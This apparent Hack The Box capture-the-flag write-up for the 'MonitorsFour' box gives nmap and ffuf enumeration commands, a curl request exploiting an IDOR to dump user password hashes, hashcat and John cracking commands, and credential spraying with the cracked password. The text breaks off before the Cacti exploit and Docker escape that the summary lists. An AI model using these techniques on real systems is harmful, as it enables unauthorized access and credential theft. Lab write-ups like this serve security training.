Hack The Box - Season 9 HTB MonitorsFour Writeup - Easy - Weekly - December 6th, 2025
HackTheBox: MonitorsFour - Full Writeup
Box Information
| Property | Value |
|---|---|
| Name | MonitorsFour |
| OS | Windows (with Docker) |
| Difficulty | Easy |
| Key Techniques | API IDOR, Credential Spraying, Cacti RCE, Docker Escape |
Executive Summary
MonitorsFour is a Windows machine running a web application with an insecure API endpoint that leaks user credentials via an Insecure Direct Object Reference (IDOR) vulnerability. After cracking MD5 password hashes and performing credential spraying, we gain access to a Cacti network monitoring instance on a subdomain. Exploiting CVE-2025-24367 in Cacti 1.2.28 provides a reverse shell inside a Docker container. The container has network access to an exposed Docker API on the Windows host, which we exploit via CVE-2025-9074 to achieve full system compromise.
Reconnaissance
Initial Port Scan
nmap -sC -sV -oA nmap/monitorsfour 10.10.11.xxx
The scan reveals standard web services. Add the hostname to /etc/hosts:
echo "10.10.11.xxx monitorsfour.htb" | sudo tee -a /etc/hosts
Web Directory Enumeration
Using ffuf for directory brute-forcing with a medium-sized wordlist:
ffuf -t 400 -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories-lowercase.txt \
-u http://monitorsfour.htb/FUZZ -ac
Key Finding: /user endpoint discovered, returning JSON data.
Subdomain Enumeration
Virtual host enumeration to discover additional attack surface:
ffuf -t 400 -w /usr/share/seclists/Discovery/DNS/combined_subdomains.txt \
-u http://monitorsfour.htb \
-H "Host: FUZZ.monitorsfour.htb" -ac
Key Finding: cacti.monitorsfour.htb subdomain discovered.
Add to hosts file:
echo "10.10.11.xxx cacti.monitorsfour.htb" | sudo tee -a /etc/hosts
Vulnerability Assessment
API IDOR Vulnerability
The /user endpoint accepts a token parameter that appears to be a sequential user ID. Testing with token=0 returns all users in the database:
curl -s "http://monitorsfour.htb/user?token=0" | jq
Leaked Credentials:
| Username | MD5 Hash | Full Name |
|---|---|---|
| admin | [HASH_REDACTED] |
(Admin) |
| mwatson | [HASH_REDACTED] |
Marcus Watson |
| janderson | [HASH_REDACTED] |
J. Anderson |
| dthompson | [HASH_REDACTED] |
D. Thompson |
Vulnerability Details:
- Type: Insecure Direct Object Reference (IDOR)
- Impact: Complete user database enumeration including password hashes
- Root Cause: No authorization check on the token parameter; value of 0 bypasses user-specific filtering
Exploitation
Phase 1: Password Cracking
The leaked hashes are unsalted MD5, making them trivial to crack with a wordlist attack:
# Create hash file
echo "[HASH_REDACTED]" > hashes.txt
# Crack with hashcat (-m 0 = MD5)
hashcat -m 0 hashes.txt /usr/share/wordlists/rockyou.txt
Cracked Password: wonderful1
Alternative using John the Ripper:
john --format=raw-md5 --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt
Phase 2: Credential Spraying & Web Application Access
With the password wonderful1 and usernames extracted from the API (including full names like "Marcus Watson"), we derive potential usernames and perform credential spraying.
Main Application Login:
Navigate to http://monitorsfour.htb/login and test credentials:
- Valid Credentials:
marcus:wonderful1
The username marcus was derived from the full name "Marcus Watson" (mwatson) returned by the API.